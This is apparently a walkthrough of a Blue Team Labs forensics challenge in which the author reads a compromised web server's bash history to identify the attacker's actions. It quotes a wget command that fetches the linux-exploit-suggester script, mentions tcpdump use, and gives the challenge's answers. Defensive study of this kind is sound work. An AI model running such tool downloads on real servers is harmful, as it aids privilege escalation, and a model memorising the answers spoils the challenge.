https://blueteamlabs.online/home/challenge/4

Table of Contents

Introduction

A server with sensitive data was accessed by an attacker and the files were posted on an underground forum. This data was only available to a privileged user, in this case the ‘root’ account. Responders say ‘www-data’ would be the logged in user if the server was remotely accessed, and this user doesn’t have access to the data. The developer stated that the server is hosting a PHP-based website and that proper filtering is in place to prevent php file uploads to gain malicious code execution. The bash history is provided to you but the recorded commands don’t appear to be related to the attack. Can you find what actually happened?

Questions

We have a single file, bash_history. This is, as the name suggest, the history of commands run in the terminal (bash). This challenge is simply reading through the commands and understanding what they all do.

What user (other than ‘root’) is present on the server?

In Linux, user directories are located within /home. Looking through the logs, on line 21, we see:

cd /home/daniel/

Change directory to daniel's home folder.

daniel

What script did the attacker try to download to the server?

We can simply look for scripts, URLs, or methods to download things via bash. Line 32:

wget <https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh> -O les.sh

linux-exploit-suggester.sh

What packet analyzer tool did the attacker try to use?

What's the most common packet analyser tool for the command line? Line 47:

tcpdump

What file extension did the attacker use to bypass the file upload filter implemented by the developer?